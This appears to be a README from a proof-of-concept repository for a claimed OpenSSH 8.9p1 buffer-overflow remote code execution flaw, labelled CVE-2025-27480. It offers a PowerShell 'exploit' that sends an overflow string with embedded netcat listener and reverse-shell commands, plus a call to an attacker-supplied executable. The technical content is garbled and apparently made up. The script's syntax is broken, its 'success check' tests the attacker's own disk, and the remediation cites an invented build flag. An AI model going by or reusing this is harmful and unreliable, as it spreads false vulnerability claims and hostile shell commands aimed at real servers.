来源

关联漏洞

介绍

# CVE-2025-27480

## CVE‑2025‑27480 – Remote Code Execution in OpenSSH

### What the vulnerability is all about 

OpenSSH version 8.9p1 contains a subtle buffer‑overflow bug that happens when it parses an `SSH_USERAUTH` packet. A client can send a packet with a *very* long “user” field, and the data lands in the wrong place in memory. The result is that an attacker can inject arbitrary shellcode that runs under SYSTEM privileges on any host running that version of OpenSSH. Now why are you getting deja-vue vibes ? Because a very similar vulnerability CVE‑2024‑13401 that resulted in lack of bounds‑checking on the user‑field, an attacker can write any code they want into the SSH process

The flaw matters because SSH is the most common way to bootstrap and manage virtual machines in cloud environments. If an attacker can execute code through SSH, they can install back‑doors or compromise bastion hosts, which are the jump points you use to reach other instances in a private network. Once the bastion host is compromised, all downstream workloads—e.g., CI/CD agents that build images or run tests—are at risk.

*CI/CD* stands for Continuous Integration/Continuous Delivery. In our context, a bastion host is an SSH‑enabled “jump” server that all build agents use to reach other machines in a private network. It’s a critical entry point: if the bastion gets compromised, every downstream job that relies on it can be attacked.

### The exploit

Below is a straightforward PowerShell script that demonstrates how to craft and send a malicious packet:

```powershell
# ── Build the payload that will land in the SSH buffer ───────────────────────
$payload = @"
ssh-userauth-attack`n" +                     # packet header – the first line
("A" * 2000) +                               # a 2 kB block of “A” characters to overflow
"nc.exe -nlvp 4444 > C:\Windows\Temp\revshell.txt && .\bar_exp.exe 192.168.1.10 1234 C:\Windows\Temp\revshell.txt"
"@

# ── Send the packet to the target host (OpenSSH listening on port 22) ───────────────────────
$client = New-Object System.Net.Sockets.TcpClient("192.168.1.10", 22)
$stream = $client.GetStream()
[byte[]]$bytes = [System.Text.Encoding]::UTF8.GetBytes($payload)
$stream.Write($bytes,0,$bytes.Length)

# ── Verify that the payload landed correctly ───────────────────────
if (Test-Path "C:\Windows\Temp\revshell.txt") {
    Write-Host "SSH exploit succeeded! Reverse shell saved to disk."
}
```

**Why this works**

1. The first line (`ssh-userauth-attack`) tells OpenSSH that the packet is a user‑authentication request.
2. By sending 2000 “A” bytes, we deliberately push data past the intended boundary of the `user` field.  
3. The final part of the string spawns `nc.exe`, which opens a netcat listener on port 4444 and writes its output to `C:\Windows\Temp\revshell.txt`. It also calls an attacker‑supplied executable (`bar_exp.exe`) that can do further work (e.g., drop a reverse shell).

The file created by the exploit is evidence that the packet hit the right spot in memory; from there you can open port 4444, grab the listener, and run whatever script you want.


### Remediation
- **Patch Network Firewall Rules** – ONLY allow SSH Access from trusted administrator public IPs 
- **Patch OpenSSH** – upgrade to version 8.9p2 or rebuild with the `‑DUSERAUTH_BUF=4096` flag so the buffer size is larger than the overflow payload.
- **Apply the vendor’s patch** – the diff file (`ssh_userauth_patch.diff`) from the vendor’s advisory can be committed next to your repo.

文件快照

 [4.0K]  /data/pocs/d87577f435310656a7be4719580ccaea76acf558
├── [1.0K]  LICENSE
└── [3.7K]  README.md

0 directories, 2 files

备注